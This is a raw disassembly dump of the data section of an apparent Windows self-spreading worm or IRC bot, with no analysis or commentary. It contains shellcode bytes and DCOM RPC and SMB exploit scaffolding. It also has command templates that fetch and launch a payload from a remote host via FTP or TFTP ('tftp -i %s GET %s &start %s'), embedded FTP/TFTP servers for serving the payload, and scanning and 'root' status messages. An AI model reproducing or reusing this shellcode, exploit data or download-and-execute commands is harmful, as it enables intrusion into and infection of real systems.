stru_41CBA8 _msExcept7 <19930520h, 1, offset stru_41CBA0, 0, 0, 0>
; DATA XREF: .text:loc_41B370�o
stru_41CBC4 _msExcInfo <-1, offset sub_41B37A> ; DATA XREF: .rdata:stru_41CBCC�o
stru_41CBCC _msExcept7 <19930520h, 1, offset stru_41CBC4, 0, 0, 0>
; DATA XREF: .text:loc_41B382�o
stru_41CBE8 _msExcInfo <-1, offset sub_41B38C> ; DATA XREF: .rdata:stru_41CBF0�o
stru_41CBF0 _msExcept7 <19930520h, 1, offset stru_41CBE8, 0, 0, 0>
; DATA XREF: .text:loc_41B394�o
align 10h
dd offset off_42485C
align 8
dd 0FFFFFFFFh, 0
dword_41CC20 dd 1Ch, 41B154h, 3, 41CC0Ch, 41CB48h, 41CB2Chdword_41CC38 dd 0 ; sub_41B16C+2D�o
dd offset sub_41B0ED
dd 0
dd offset dword_41CC20+8
stru_41CC48 _msExcInfo <-1, offset sub_41B39E> ; DATA XREF: .rdata:stru_41CC50�o
stru_41CC50 _msExcept7 <19930520h, 1, offset stru_41CC48, 0, 0, 0>
; DATA XREF: .text:loc_41B3A6�o
dword_41CC6C dd 2, 41CB48h, 41CB2Chdword_41CC78 dd 0 dd offset sub_41AF50
dd 0
dd offset dword_41CC6C
dd 1CE44h, 2 dup(0)
dd 1CE9Ch, 1C180h, 1CCC4h, 2 dup(0)
dd 1D54Eh, 1C000h, 5 dup(0)
dd 1D146h, 1D534h, 1D522h, 1D510h, 1D500h, 1D4ECh, 1D4DCh
dd 1D4CAh, 1D4B8h, 1D4A8h, 1D498h, 1D47Ah, 1D460h, 1D448h
dd 1D42Eh, 1D414h, 1D3F8h, 1D3ECh, 1D3E2h, 1D3D6h, 1D3C6h
dd 1CEA8h, 1CEBEh, 1CEC6h, 1CED2h, 1CEDEh, 1CEF2h, 1CF00h
dd 1CF0Eh, 1CF24h, 1CF32h, 1CF42h, 1CF52h, 1CF6Ah, 1CF82h
dd 1CF92h, 1CFBAh, 1CFD2h, 1CFDEh, 1CFF0h, 1CFFEh, 1D014h
dd 1D028h, 1D036h, 1D042h, 1D05Ah, 1D070h, 1D07Ch, 1D08Ch
dd 1D09Eh, 1D0B2h, 1D0C4h, 1D0D6h, 1D0E6h, 1D0FCh, 1D10Ah
dd 1D118h, 1D12Ah, 1D15Ch, 1D16Ch, 1D182h, 1D194h, 1D1A6h
dd 1D1B6h, 1D1C6h, 1D1D4h, 1D1EAh, 1D1F6h, 1D20Ch, 1D21Ch
dd 1D230h, 1D244h, 1D256h, 1D268h, 1D274h, 1D280h, 1D28Ch
dd 1D2A6h, 1D2B6h, 1D2C8h, 1D2DAh, 1D2E8h, 1D2F6h, 1D304h
dd 1D312h, 1D322h, 1D330h, 1D340h, 1D352h, 1D35Eh, 1D370h
dd 1D380h, 1D38Eh, 1D3A0h, 1D3B6h, 0
dd 8000000Ch, 80000014h, 80000006h, 80000008h, 8000006Fh
dd 8000000Bh, 80000004h, 80000074h, 80000073h, 80000015h
dd 8000000Ah, 80000009h, 80000002h, 8000000Dh, 80000001h
dd 80000010h, 80000003h, 80000017h, 80000013h, 80000012h
dd 80000097h, 0
aWs2_32_dll_0 db 'WS2_32.DLL',0
align 4
db 75h ; u
db 2, 4Dh, 75h
aLtibytetowidec db 'ltiByteToWideChar',0
dw 356h
aSleep db 'Sleep',0
dw 2B5h
aReadfile db 'ReadFile',0
align 2
dw 3A4h
aWritefile db 'WriteFile',0
dw 368h
aTransactnamedp db 'TransactNamedPipe',0
a4_0 db '4',0
aClosehandle db 'CloseHandle',0
aS_5 db 'S',0
aCreatefilea db 'CreateFileA',0
dw 17Dh
aGetmodulefilen db 'GetModuleFileNameA',0
align 4
db '',0
aExitthread db 'ExitThread',0
align 2
dw 171h
aGetlasterror db 'GetLastError',0
align 2
aO db 'o',0
aCreatethread db 'CreateThread',0
align 2
dw 251h
aLeavecriticals db 'LeaveCriticalSection',0
align 2
aS_6 db '',0
aEntercriticals db 'EnterCriticalSection',0
align 2
dw 1DFh
aGettickcount db 'GetTickCount',0
align 2
dw 224h
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0
aB db '',0
aDeletecritical db 'DeleteCriticalSection',0
db '',0
aFindclose db 'FindClose',0
db '',0
aFindfirstfilea db 'FindFirstFileA',0
align 10h
aG db '',0
aDeletefilea db 'DeleteFileA',0
dw 319h
aSetfileattribu db 'SetFileAttributesA',0
align 4
dd 6554035Eh, 6E696D72h, 50657461h, 65636F72h, 7373h, 704F0286h
dd 72506E65h, 7365636Fh, 3C30073h, 7274736Ch, 69706D63h
dd 1F30041h
aGetwindowsdire db 'GetWindowsDirectoryA',0
align 2
dw 1C1h
aGetsystemdirec db 'GetSystemDirectoryA',0
dd 736C03C0h, 6D637274h, 4170h, 6F4C0252h, 694C6461h, 72617262h
dd 4179h, 654701A0h, 6F725074h, 64644163h, 73736572h, 17F0000h
dd 4D746547h, 6C75646Fh, 6E614865h, 41656C64h, 0F30000h
dd 6D726F46h, 654D7461h, 67617373h, 4165h, 6E550371h, 5670616Dh
dd 4F776569h, 6C694666h, 2680065h, 5670614Dh, 4F776569h
dd 6C694666h, 540065h
aCreatefilemapp db 'CreateFileMappingA',0
align 4
dd 6553031Fh, 6C694674h, 6D695465h, 1650065h, 46746547h
dd 54656C69h, 656D69h, 72430066h, 65746165h, 636F7250h
dd 41737365h, 0BC0000h
aExpandenvironm db 'ExpandEnvironmentStringsA',0
dw 15Eh
aGetfileattribu db 'GetFileAttributesA',0
align 4
db 0D5h ;
db 1, 47h, 65h
aTtemppatha db 'tTempPathA',0
align 4
db 4
db 2, 47h, 6Ch
aObalmemorystat db 'obalMemoryStatus',0
align 2
dw 1E0h
aGettimeformata db 'GetTimeFormatA',0
align 4
db 47h ; G
db 1, 47h, 65h
aTdateformata db 'tDateFormatA',0
align 2
dw 1E9h
aGetversionexa db 'GetVersionExA',0
dw 173h
aGetlocaltime db 'GetLocalTime',0
align 2
db '',0
aExitprocess db 'ExitProcess',0
db 43h ; C
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcessId',0
aC_1 db 'C',0
aCopyfilea db 'CopyFileA',0
dw 390h
aWaitforsingleo db 'WaitForSingleObject',0
db '`',0
aCreatemutexa db 'CreateMutexA',0
align 4
db 42h ; B
db 1, 47h, 65h
aTcurrentproc_0 db 'tCurrentProcess',0
db 14h
db 1, 47h, 65h
aTcomputernamea db 'tComputerNameA',0
align 4
db 74h ; t
db 1, 47h, 65h
aTlocaleinfoa db 'tLocaleInfoA',0
align 2
dw 35Fh
aTerminatethrea db 'TerminateThread',0
db 10h
db 2, 48h, 65h
aApalloc db 'apAlloc',0
db 16h
db 2, 48h, 65h
aApfree db 'apFree',0
align 10h
db 0D7h ;
db 2, 52h, 74h
aLunwind db 'lUnwind',0
db 0E2h ;
db 1, 47h, 65h
aTtimezoneinfor db 'tTimeZoneInformation',0
align 2
dw 1C8h
aGetsystemtime db 'GetSystemTime',0
dw 1B7h
aGetstartupinfo db 'GetStartupInfoA',0
db 10h
db 1, 47h, 65h
aTcommandlinea db 'tCommandLineA',0
dw 1E8h
aGetversion db 'GetVersion',0
align 4
db 14h
db 2, 48h, 65h
aApdestroy db 'apDestroy',0
dw 212h
aHeapcreate db 'HeapCreate',0
align 4
db 83h ;
db 3, 56h, 69h
aRtualfree db 'rtualFree',0
dw 381h
aVirtualalloc db 'VirtualAlloc',0
align 2
dw 21Ah
aHeaprealloc db 'HeapReAlloc',0
db 36h ; 6
db 2, 49h, 73h
aBadwriteptr db 'BadWritePtr',0
db 0A7h ;
db 2, 52h, 61h
aIseexception db 'iseException',0
align 2
dw 21Ch
aHeapsize db 'HeapSize',0
align 2
dw 324h
aSethandlecount db 'SetHandleCount',0
align 10h
db 0B9h ;
db 1, 47h, 65h
aTstdhandle db 'tStdHandle',0
align 10h
db 66h ; f
db 1, 47h, 65h
aTfiletype db 'tFileType',0
dw 31Bh
aSetfilepointer db 'SetFilePointer',0
align 10h
db 94h ;
db 3, 57h, 69h
aDechartomultib db 'deCharToMultiByte',0
dw 244h
aLcmapstringa db 'LCMapStringA',0
align 2
dw 245h
aLcmapstringw db 'LCMapStringW',0
align 2
dw 104h
aGetcpinfo db 'GetCPInfo',0
dw 0FDh
aGetacp db 'GetACP',0
align 4
db 93h ;
db 1, 47h, 65h
aToemcp db 'tOEMCP',0
align 4
db 6Eh ; n
db 3, 55h, 6Eh
aHandledexcepti db 'handledExceptionFilter',0
align 4
db 0F6h ;
align 2
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dw 0F7h
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
db 55h ; U
db 1, 47h, 65h
aTenvironmentst db 'tEnvironmentStrings',0
db 57h ; W
db 1, 47h, 65h
aTenvironment_0 db 'tEnvironmentStringsW',0
align 2
dw 34Ah
aSetunhandledex db 'SetUnhandledExceptionFilter',0
db 33h ; 3
db 2, 49h, 73h
aBadreadptr db 'BadReadPtr',0
align 4
db 30h ; 0
db 2, 49h, 73h
aBadcodeptr db 'BadCodePtr',0
align 4
db 0BAh ;
db 1, 47h, 65h
aTstringtypea db 'tStringTypeA',0
align 2
dw 1BDh
aGetstringtypew db 'GetStringTypeW',0
align 4
db 37h ; 7
db 3, 53h, 65h
aTstdhandle_0 db 'tStdHandle',0
align 4
aU db '',0
aFlushfilebuffe db 'FlushFileBuffers',0
align 10h
db 10h
db 3, 53h, 65h
aTendoffile db 'tEndOfFile',0
align 10h
db ':',0
aComparestringa db 'CompareStringA',0
align 2
db ';',0
aComparestringw db 'CompareStringW',0
align 4
db 13h
db 3, 53h, 65h
aTenvironmentva db 'tEnvironmentVariableA',0
aKernel32_dll db 'KERNEL32.dll',0
align 100h
_rdata ends
; Section 3. (virtual address 0001E000)
; Virtual size : 00053914 ( 342292.)
; Section size in file : 00053914 ( 342292.)
; Offset to raw data for section: 0001C000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 41E000h
dword_41E000 dd 0 dd offset sub_402C60
dword_41E008 dd 0 dword_41E00C dd 0 dd offset ___onexitinit
dd offset ___initmbctable
dd offset ___initstdio
dd offset sub_418A65
dword_41E020 dd 0 dword_41E024 dd 0 dd offset ___endstdio
dword_41E02C dd 0 dword_41E030 dd 0 dd offset sub_418A76
dword_41E038 dd 2 dup(0) dword_41E040 dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0 ; sub_4016C0+352�o
dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_41E08C dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
; DATA XREF: sub_4011CD+24D�o
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dword_41E3F0 dd 20h, 0 dd 20h, 5C005Ch, 0
off_41E404 dd offset dword_43005C ; DATA XREF: sub_4011CD+2DC�o
a12345611111111:
unicode 0, <$\123456111111111111111.doc>,0
dd 0
dword_41E444 dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0 dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
aFxnbfxfxnbfxfx: ; DATA XREF: sub_4011CD+65�o
; sub_4011CD+125�o
unicode 0, <FXNBFXFXNBFXFXFXFX>
dw 0FFFFh
dw 0FFFFh
dd 2 dup(7FFDE0CCh), 0
aRrrrrrrrrrrrrr db ''
db ''
db '',0
dword_41E554 dd 10016C6h ; sub_4011CD+234�o
dword_41E558 dd 100139Dh ; sub_4011CD+21C�o
aIpc: ; DATA XREF: sub_401000+B�o
unicode 0, <\IPC$>,0
asc_41E568: ; DATA XREF: sub_401000+19�o
unicode 0, <\\>,0
align 10h
aIpc_0: ; DATA XREF: sub_40110C+B�o
unicode 0, <\IPC$>,0
asc_41E57C: ; DATA XREF: sub_40110C+19�o
unicode 0, <\\>,0
align 4
; char aSPipeEpmapper[]
aSPipeEpmapper db '\\%s\pipe\epmapper',0 ; DATA XREF: sub_4016C0+3D�o
align 4
aRbrbrbrb db 'BBBB',0 ; DATA XREF: sub_401EC3+CA�o
align 4
dword_41E5A4 dd 10FF8h, 0 dword_41E5AC dd 10FF8h dword_41E5B0 dd 7FFDF020h, 0 dword_41E5B8 dd 424D53FFh, 72h, 0C8531800h, 3 dup(0) dd 13370000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
aLanman1_0 db 'LANMAN1.0',0
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
aLm1_2x002 db 'LM1.2X002',0
dw 4C02h
aAnman2_1 db 'ANMAN2.1',0
db 2, 4Eh, 54h
aLm0_12 db ' LM 0.12',0
align 10h
dword_41E640 dd 424D53FFh, 73h, 0C8071800h, 3 dup(0) dd 13370000h, 0
dd 0FF0Ch, 0A110400h, 2 dup(0)
dword_41E670 dd 0 dd 800000D4h, 0
; char buf[]
buf db '',0 ; DATA XREF: sub_4025FE+A�o
dw 4400h
aCkfdenecfdeffc db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aCacacacacacaca db ' CACACACACACACACACACACACACACACAAA',0
align 8
byte_41E6C8 db 41h ; DATA XREF: sub_4026C9+140�r
aBcdefghijklmno db 'BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
align 4
aSvwfbA db 'SVWf',0 ; DATA XREF: .text:00402A37�o
aIcsa db '',0
db 2 dup(0), 0FFh
dd 12096836h, 0F7E863D6h, 89000000h, 0A2E80846h, 0FF000000h
dd 6B680476h, 0E8CA2BD0h, 0E2h, 0E80C4689h, 3Fh, 680476FFh
dd 4C0297FAh, 0CDE8h, 68DB3100h, 410h, 89D0FF53h, 768B56C3h
dd 0B9C78910h, 410h, 315EA4F3h, 505050C0h, 0FF505053h
dd 468B0C56h, 0C4816608h, 5E5F0080h, 60E0FF5Bh, 23E8h
dd 24448B00h, 7C588D0Ch, 53C4383h, 284381h, 81000010h
dd 0F0002863h, 48BFFFFh, 14C48324h, 0C3C03150h, 0FF64D231h
dd 22896432h, 90B8DB31h, 31429042h, 8902B1C9h, 74AFF3DFh
dd 0F3EB4303h, 64107E89h, 6158028Fh, 20BF60C3h, 8B7FFDF0h
dd 8468B1Fh, 7F8B0789h, 78C781F8h, 89000001h, 741939F9h
dd 0EB098B04h, 39FA89F8h, 574045Ah, 0EB04528Bh, 891189F6h
dd 43C6044Ah, 0C36101FDh, 0FDF00CA1h, 1C408B7Fh, 8908588Bh
dd 8B008B1Eh, 46890840h, 8B60C304h, 8B28246Ch, 548B3C45h
dd 0EA017805h, 8B184A8Bh, 0EB01205Ah, 8B4938E3h, 0EE018B34h
dd 0C031FF31h, 0E038ACFCh, 0CFC10774h, 0EBC7010Dh, 247C3BF4h
dd 8BE17524h, 0EB01245Ah, 4B0C8B66h, 11C5A8Bh, 8B048BEBh
dd 4489E801h, 0C2611C24h, 0FEEB0008h, 0
dword_41E874 dd 0F254C481h, 0E8FCFFFFh, 46h, 8B3C458Bh, 178057Ch, 184F8BEFh
; DATA XREF: .text:004029CD�o
dd 1205F8Bh, 492EE3EBh, 18B348Bh, 99C031EEh, 74C084ACh
dd 0DCAC107h, 0F4EBC201h, 424543Bh, 5F8BE375h, 66EB0124h
dd 8B4B0C8Bh, 0EB011C5Fh, 18B1C8Bh, 245C89EBh, 0C031C304h
dd 30408B64h, 0F78C085h, 8B0C408Bh, 8BAD1C70h, 0BE90868h
dd 8B000000h, 7C053440h, 8B000000h, 315F3C68h, 0EB5660F6h
dd 0CEEF680Dh, 986860E0h, 570E8AFEh, 0EEE8E7FFh, 0FFFFFFh
dword_41E904 dd 23h ; char Str[]
Str dd 909006EBh, 90909090h, 0 ; DATA XREF: sub_401EC3+105�o
; char aCccc[]
aCccc db 'CCCC',0 ; DATA XREF: sub_401EC3+181�o
align 4
dword_41E91C dd 3 ; char dword_41E920[]
dword_41E920 dd 0A1h ; char dword_41E924[]
dword_41E924 dd 30h ; char dword_41E928[]
dword_41E928 dd 62B0606h, 2050501h, 0A0h; char dword_41E934[]
dword_41E934 dd 60h aCmdKEchoOpenSD db 'cmd /k echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &'
; DATA XREF: .text:004029FB�o
db 'echo quit >> o &ftp -n -s:o &del /F /Q o &%s',0Dh,0Ah,0
aSS_ db '%s// %s.',0 ; DATA XREF: .text:00402C12�o
align 4
aCmd db 'cmd',0 ; DATA XREF: .text:loc_403ABE�o
; .text:00403AD1�r
aExit db 'exit',0
align 10h
word_41E9C0 dw 4 ; DATA XREF: sub_403564+8�r
align 4
word_41E9C4 dw 1 ; DATA XREF: sub_403564+12�r
align 4
aRfb003_008 db 'RFB 003.008',0Ah,0 ; DATA XREF: .text:004037BB�o
align 4
dword_41E9D8 dd 201h word_41E9DC dw 1 ; DATA XREF: .text:004037E2�r
align 10h
word_41E9E0 dw 1 ; DATA XREF: .text:004037EF�r
align 4
dword_41E9E4 dd 0EBFFh dword_41E9E8 dd 51FFh dword_41E9EC dd 0DFFh word_41E9F0 dw 72h ; DATA XREF: .text:00403820�r
align 4
aTryingToRootSD db 'Trying to root %s:%d.',0 ; DATA XREF: .text:00403A04�o
align 4
aC db '%c',0 ; DATA XREF: .text:00403AD9�o
align 10h
aCmdCTftpISGetS db 'cmd /c tftp -i %s GET %s &start %s &exit',0 ; DATA XREF: .text:00403B4E�o
align 4
aC_0 db '%c',0 ; DATA XREF: .text:00403B8D�o
align 10h
; char a220Stnyftpd0wn[]
a220Stnyftpd0wn db '220 StnyFtpd 0wns j0',0Ah,0 ; DATA XREF: sub_403C1E+31F�o
align 4
; char aSS_1[]
aSS_1 db '%s %s',0 ; DATA XREF: sub_403C1E+40A�o
align 10h
; char Str2[]
Str2 db 'USER',0 ; DATA XREF: sub_403C1E+41E�o
align 4
; char a331PasswordReq[]
a331PasswordReq db '331 Password required',0Ah,0 ; DATA XREF: sub_403C1E+439�o
align 10h
; char aPass[]
aPass db 'PASS',0 ; DATA XREF: sub_403C1E:loc_40406D�o
align 4
; char a230UserLoggedI[]
a230UserLoggedI db '230 User logged in.',0Ah,0 ; DATA XREF: sub_403C1E+46A�o
align 10h
; char aSyst[]
aSyst db 'SYST',0 ; DATA XREF: sub_403C1E:loc_40409E�o
align 4
; char a215Stnyftpd[]
a215Stnyftpd db '215 StnyFtpd',0Ah,0 ; DATA XREF: sub_403C1E+49B�o
align 4
; char aRest[]
aRest db 'REST',0 ; DATA XREF: sub_403C1E:loc_4040CF�o
align 10h
; char a350Restarting_[]
a350Restarting_ db '350 Restarting.',0Ah,0 ; DATA XREF: sub_403C1E+4CC�o
align 4
; char off_41EAD4[]
off_41EAD4 dd offset dword_445750 ; DATA XREF: sub_403C1E:loc_404100�o
; char a257IsCurrentDi[]
a257IsCurrentDi db '257 "/" is current directory.',0Ah,0 ; DATA XREF: sub_403C1E+4FD�o
align 4
; char aType[]
aType db 'TYPE',0 ; DATA XREF: sub_403C1E:loc_404131�o
align 10h
; char aA[]
aA: ; DATA XREF: sub_403C1E+52A�o
unicode 0, <A>,0
; char a200TypeSetToA_[]
a200TypeSetToA_ db '200 Type set to A.',0Ah,0 ; DATA XREF: sub_403C1E+545�o
; char aType_0[]
aType_0 db 'TYPE',0 ; DATA XREF: sub_403C1E:loc_404179�o
align 10h
; char aI[]
aI: ; DATA XREF: sub_403C1E+572�o
unicode 0, <I>,0
; char a200TypeSetToI_[]
a200TypeSetToI_ db '200 Type set to I.',0Ah,0 ; DATA XREF: sub_403C1E+58D�o
; char aPasv[]
aPasv db 'PASV',0 ; DATA XREF: sub_403C1E:loc_4041C1�o
align 10h
a425PassiveNotS db '425 Passive not supported on this server',0Ah,0
; DATA XREF: sub_403C1E+5BD�o
align 4
; char aList[]
aList db 'LIST',0 ; DATA XREF: sub_403C1E:loc_404212�o
align 4
a226TransferCom db '226 Transfer complete',0Ah,0 ; DATA XREF: sub_403C1E+60E�o
align 4
; char aPort[]
aPort db 'PORT',0 ; DATA XREF: sub_403C1E:loc_404264�o
align 4
; char aS[]
aS db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah ; DATA XREF: sub_403C1E+68B�o
db ']',0
; char aXX[]
aXX db '%x%x',0Ah,0 ; DATA XREF: sub_403C1E+6E4�o
align 4
; char aS_S_S_S[]
aS_S_S_S db '%s.%s.%s.%s',0 ; DATA XREF: sub_403C1E+72D�o
; char a200PortCommand[]
a200PortCommand db '200 PORT command successful.',0Ah,0 ; DATA XREF: sub_403C1E+745�o
align 10h
; char aRetr[]
aRetr db 'RETR',0 ; DATA XREF: sub_403C1E:loc_404379�o
align 4
; char a150OpeningBina[]
a150OpeningBina db '150 Opening BINARY mode data connection',0Ah,0
; DATA XREF: sub_403C1E+77A�o
align 4
; char a226TransferC_0[]
a226TransferC_0 db '226 Transfer complete.',0Ah,0 ; DATA XREF: sub_403C1E+7B2�o
; char aFtpFileTransfe[]
aFtpFileTransfe db 'FTP File transfer complete: %s',0 ; DATA XREF: sub_403C1E+7CA�o
align 4
; char a425CanTOpenDat[]
a425CanTOpenDat db '425 Can',27h,'t open data connection.',0Ah,0
; DATA XREF: sub_403C1E+815�o
align 10h
; char aQuit[]
aQuit db 'QUIT',0 ; DATA XREF: sub_403C1E:loc_404446�o
align 4
; char a221GoodbyeHapp[]
a221GoodbyeHapp db '221 Goodbye happy r00ting.',0Ah,0 ; DATA XREF: sub_403C1E+843�o
; char Mode[]
Mode db 'rb',0 ; DATA XREF: sub_404515+32�o
align 4
aOctet db 'octet',0 ; DATA XREF: StartAddress+B�o
align 10h
; char aTftpdErrorSock[]
aTftpdErrorSock db '-TFTPD- Error: socket() failed, returned: <%d>.',0
; DATA XREF: StartAddress+80�o
; char aRb_0[]
aRb_0 db 'rb',0 ; DATA XREF: StartAddress:loc_4047F5�o
align 4
; char aTftpdFailedToO[]
aTftpdFailedToO db '-TFTPD- Failed to open file: %s.',0 ; DATA XREF: StartAddress+19D�o
align 4
dword_41ED08 dd 1000500h, 656C6946h, 746F4E20h, 756F4620h, 646Eh
; DATA XREF: StartAddress+412�o
; char aTftpdFileNotFo[]
aTftpdFileNotFo db '-TFTPD- File not found: %s (%s).',0 ; DATA XREF: StartAddress+431�o
align 10h
; char aTftpFileTransf[]
aTftpFileTransf db 'TFTP File transfer complete: %s',0 ; DATA XREF: StartAddress+638�o
dword_41ED60 dd 4000500h, 7868746Bh, 2 dup(0)aDcom135_0 db 'dcom135',0 ; DATA XREF: sub_405759+202�o
; sub_40ABFE+2A53�o ...
db 2 dup(0)
aDcom135 db 'Dcom135',0 ; DATA XREF: .text:00402C0C�o
; sub_404D97+7E�o
align 4
dd 5 dup(0)
dword_41ED98 dd 87h ; sub_40ABFE+2A32�r ...
off_41ED9C dd offset sub_4016C0 ; DATA XREF: sub_405759+29F�r
dword_41EDA0 dd 0 ; .text:00402C51�w ...
dword_41EDA4 dd 1 dd 0
aAsn1smbnt db 'asn1smbnt',0
aAsn1smbnt_0 db 'asn1smbnt',0
dd 5 dup(0)
dd 8Bh, 4029A5h, 0
dd 2 dup(1), 72636E76h, 65746F6Fh, 4E560072h, 6F6F5243h
dd 726574h, 5 dup(0)
dd 170Ch, 4037B0h, 0
dd 1, 10h dup(0)
; char aScanExploitSta[]
aScanExploitSta db '[SCAN]: Exploit Statistics:',0 ; DATA XREF: sub_404D97+10�o
; char aSD[]
aSD db ' %s: %d,',0 ; DATA XREF: sub_404D97+84�o
align 4
; char aTotalD[]
aTotalD db ' Total: %d',0 ; DATA XREF: sub_404D97+BE�o
align 4
; char aScanCurrentIpS[]
aScanCurrentIpS db '[SCAN]: Current IP: %s.',0 ; DATA XREF: sub_404EAD+32�o
; char aScanScanNotAct[]
aScanScanNotAct db '[SCAN]: Scan not active.',0 ; DATA XREF: sub_404EAD:loc_404EF5�o
align 4
; char aTftpdServerSta[]
aTftpdServerSta db '[TFTPD]: Server started on IP: %s:%d, File: %s, Request: %s.',0
; DATA XREF: sub_404F31+F4�o
align 4
; char aTftpdFailedToS[]
aTftpdFailedToS db '[TFTPD]: Failed to start server, error: <%d>.',0
; DATA XREF: sub_404F31+17F�o
align 4
; char aFtpServerStart[]
aFtpServerStart db '[FTP]: Server started on Port: %d, File: %s, Request: %s.',0
; DATA XREF: sub_404F31+275�o
align 4
; char aFtpFailedToSta[]
aFtpFailedToSta db '[FTP]: Failed to start server, error: <%d>.',0
; DATA XREF: sub_404F31+300�o
; char aD_D_D_D[]
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_4052B5+3B�o
aSocketOpenFail db 'socket open failed',0 ; DATA XREF: .text:0040562B�o
align 10h
aSendtoSocketFa db 'sendto() socket failed. sent = %d <%d>.',0 ; DATA XREF: .text:0040567D�o
aRecvfromSocket db 'recvfrom() socket failed',0 ; DATA XREF: .text:00405705�o
align 4
aSocketOpen_ db 'Socket open.',0 ; DATA XREF: .text:0040573A�o
align 4
aSocketClosed_ db 'Socket closed.',0 ; DATA XREF: .text:loc_40574A�o
align 4
; char aScanIpSDScanTh[]
aScanIpSDScanTh db '[SCAN]: IP: %s:%d, Scan thread: %d, Sub-thread: %d.',0
; DATA XREF: sub_405759+EB�o
; char aScanIpSPortDIs[]
aScanIpSPortDIs db '[SCAN]: IP: %s, Port %d is open.',0 ; DATA XREF: sub_405759+161�o
align 4
; char aScanFailedToIn[]
aScanFailedToIn db '[SCAN]: Failed to initialize critical section.',0
; DATA XREF: sub_405A2E+8D�o
align 4
; char aScanSDScanThre[]
aScanSDScanThre db '[SCAN]: %s:%d, Scan thread: %d, Sub-thread: %d.',0
; DATA XREF: sub_405A2E+127�o
; char aScanFailedToSt[]
aScanFailedToSt db '[SCAN]: Failed to start worker thread, error: <%d>.',0
; DATA XREF: sub_405A2E+1B7�o
; char aScanFinishedAt[]
aScanFinishedAt db '[SCAN]: Finished at %s:%d after %d minute(s) of scanning.',0
; DATA XREF: sub_405A2E+23A�o
align 4
; LPCSTR lpString2
lpString2 dd offset aAccwiz_exe ; DATA XREF: sub_405D52+1B2�r
; "accwiz.exe"
dd offset aActmovie_exe ; "actmovie.exe"
dd offset aAhui_exe ; "ahui.exe"
dd offset aAlg_exe ; "alg.exe"
dd offset aAppend_exe ; "append.exe"
dd offset aArp_exe ; "arp.exe"
dd offset aAsr_fmt_exe ; "asr_fmt.exe"
dd offset aAsr_ldm_exe ; "asr_ldm.exe"
dd offset aAsr_pfu_exe ; "asr_pfu.exe"
dd offset aAt_exe ; "at.exe"
dd offset aAti2evxx_exe ; "ati2evxx.exe"
dd offset aAti2mdxx_exe ; "Ati2mdxx.exe"
dd offset aAtmadm_exe ; "atmadm.exe"
dd offset aAttrib_exe ; "attrib.exe"
dd offset aAuditusr_exe ; "auditusr.exe"
dd offset aAutochk_exe ; "autochk.exe"
dd offset aAutoconv_exe ; "autoconv.exe"
dd offset aAutofmt_exe ; "autofmt.exe"
dd offset aAutolfn_exe ; "autolfn.exe"
dd offset aBlastcln_exe ; "blastcln.exe"
dd offset aBootcfg_exe ; "bootcfg.exe"
dd offset aBootok_exe ; "bootok.exe"
dd offset aBootvrfy_exe ; "bootvrfy.exe"
dd offset aCacls_exe ; "cacls.exe"
dd offset aCalc_exe ; "calc.exe"
dd offset aCharmap_exe ; "charmap.exe"
dd offset aChcfg_exe ; "ChCfg.exe"
dd offset aChkdsk_exe ; "chkdsk.exe"
dd offset aChkntfs_exe ; "chkntfs.exe"
